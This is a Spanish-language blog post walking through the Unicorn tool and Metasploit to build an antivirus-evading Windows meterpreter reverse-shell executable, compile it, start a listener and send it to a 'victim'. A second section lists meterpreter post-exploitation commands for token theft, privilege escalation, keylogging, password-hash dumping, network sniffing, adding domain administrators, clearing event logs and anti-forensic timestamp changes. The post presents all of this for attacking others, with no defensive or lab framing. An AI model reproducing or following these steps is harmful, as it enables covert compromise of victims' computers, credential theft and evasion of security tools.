Ayer por la madrugada he estado revisando el mejor SCRIPT para Kali Linux 2.0 y observe que tiene buenas herramientas de hacking. Pero me llamo la atención solo una pero sospecho que fue la madrugada más imaginaria que tuve. Esta herramienta se llama comúnmente como “UNICORN”.  Su nombre te lo dice todo aunque de imaginar lo tiene nada pero es una gran herramienta donde ha burlado algunos antivirus del sistema.
Ejemplo:

Screenshot from 2015-12-29 11:52:54

Lo que más me llamo la atención es que ESET, AVG no lo reconoce o no lo detecta como virus.

Entonces haremos el procedimiento:

Descargamos los siguiente. AQUI o AQUI

Ahora descargamos un archivito. AQUI

Despues de descargar el paquete vamos dar de alta UNICORN.

comandos:

chmod x+a unicorn.sh

En algunos caso no necesitas colocar eso y solo ejecutas con

./unicorn.sh 

Screenshot from 2015-12-29 12:15:32

Observamos los comandos que nos ofrece para hacer nuestro ataque. Donde creerá algunos archivos.

Pero empezaremos con colocar los siguientes comandos:

./unicorn.sh windows/meterpreter/reverse_tcp (IP) 443 nonuac

Te explico rápidamente usaremos un sploit para windows donde el cual vamos a colocar nuestra IP en ifconfig y el puerto dice 443 pero yo recomiendo 8080.

Screenshot from 2015-12-29 12:22:27

Nos aparece un archivo “unicorn.c” el cual vamos a compilar para convertirlo en .exe.
Se preguntarán como lo compilas cread?

Muy fácil vamos a este sitio web aquí.

Screenshot from 2015-12-29 12:25:09

Bueno después de compilar el código descargamos .exe.

Ahora lo que vamos hacer es comandar ese .exe
colocar lo siguiente comandos:

 service postgresql start

para activar la frecuencia del proceso.

 msfconsole

Arrancamos msfconsole.

 use exploit/multi/handler
 set LHOST (IP)
 set LPORT 8080
 set PAYLOADS windows/meterpreter/reversa_tcp
 exploit

Listo nuestro bebe fue creado correctamente ahora envíenselo a su victima con todo su corazón.

Y cuando la victima ejecute como administrador el software la computadora será vuestra para siempre.

Te recomiendo leer esto para hacer más fuerte su ataque AQUI

Screenshot from 2015-12-29 11:20:42
Se olvidaba si quieren escanear sus archivos AQUI y AQUi

Comandos de Meterpreter

Ultimamente se publico comandos para Kali Linux pero he estado jugando con algunas herramientas de metepreter donde personas tienen derecho de aprender y conocerlas un poco. Espero con los comandos le ayuden

Los siguientes comandos:
helpAbrir uso ayuda Meterpreter

run scriptname – Ejecutar Meterpreter-basado en scripts, para obtener una lista completa de scripts/meterpreter en el directorio.

sysinfoMostrar la información del sistema en el destino remoto.

ls Lista de archivos y carpetas en el objetivo.

use privCargue el privilegio de la extension para extender la librería del Meterpreter.

psMostrar todos los procesos en ejecución y que las cuentas estén asociadas con cada proceso.

migrate PID – Migrar específicamente el proceso de ID (PID es el objetivo del proceso ID  ganado desde el comandos PS)

use incognitoCargar funciones incógnitas. (Se utiliza para robarfichas y suplantación de una máquina de destino)

list_tokens -uLista fichas disponibles en el objetivo por el usuario.

list_tokens -gLista fichas disponibles en el objetivo por el grupo.

impersonate_token DOMAIN_NAME\\USERNAMEHacerse pasar por una ficha disponible en el objetivo.

steal_token PIDRobar las fichas disponibles para un determinado proceso y hacerse pasar por esa señal.

drop_tokenDeje de hacerse pasar por el token actual.

getsystemIntento de elevar los permisos de acceso a nivel de sistemaa través de múltiples vectores de ataque.

shellCaer en un shell interactivo con todas las fichas disponibles.

execute -f cmd.exe -iEjecutar cmd.exe e interactuar con él.

execute -f cmd.exe -i -tEjecutar cmd.exe con todas las fichasdisponibles.

execute -f cmd.exe -i -H -t  – Ejecutar cmd.exe con todas las fichasdisponibles y convertirlo en un proceso oculto.

rev2selfVolver al usuario original que utilizó para poner en peligro el objetivo.

reg commandInteractuar, crear, eliminar, consultar, set, y mucho másen el registro del destino.

setdesktop numberCambiar a una pantalla diferente en función de quién está conectado.

screenshotTome una captura de pantalla de la pantalla del destino.

upload file  –  Subir un archivo a la objetivo.

download file – Descargar los archivos desde el objetivo.

keyscan_startdetecte las pulsaciones de teclado en el destino remoto.

keyscan_dumpVolcar las teclas remotas capturados en el objetivo.

keyscan_stopDeje de detectar las pulsaciones de teclado en eldestino remoto.

getprivsObtener tantos privilegios como sea posible en el objetivo.

uictl enable keyboard/mouseToma el control del teclado y/o ratón.

backgroundEjecute su shell actual Meterpreter en el fondo.

hashdump – Volcar todos los hashes en el objetivo.

use snifferCargue el módulo sniffer.

sniffer_interfacesLista de  interfaces disponibles al objetivo.

sniffer_dump interfaceID pcapnameComience sniffer en el destino remoto.

sniffer_start interfaceID packet-bufferComience sniffer  con una gama específica para un buffer de paquetes.

sniffer_stats interfaceIDCoge la información de estadística de la interfaz que está en sniffer.

sniffer_stop interfaceIDDetenga el sniffer D:

add_user username password -h ipAgregar un usuario en el destino remoto.

add_group_user “Domain Admins” username -h ipAñadir un nombre de usuario al grupo Administradores de dominio en el destino remoto.

clearevBorrar el registro de eventos en el equipo de destino.

timestompCambiar atributos de archivo, como fecha de creación(antiforensics medida)

rebootReinicie el equipo de destino.

Bueno si conoce algunos comandos más dejalo abajo en los comentario para agregarlo. Y espero que se divierta con sus meterpreter

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s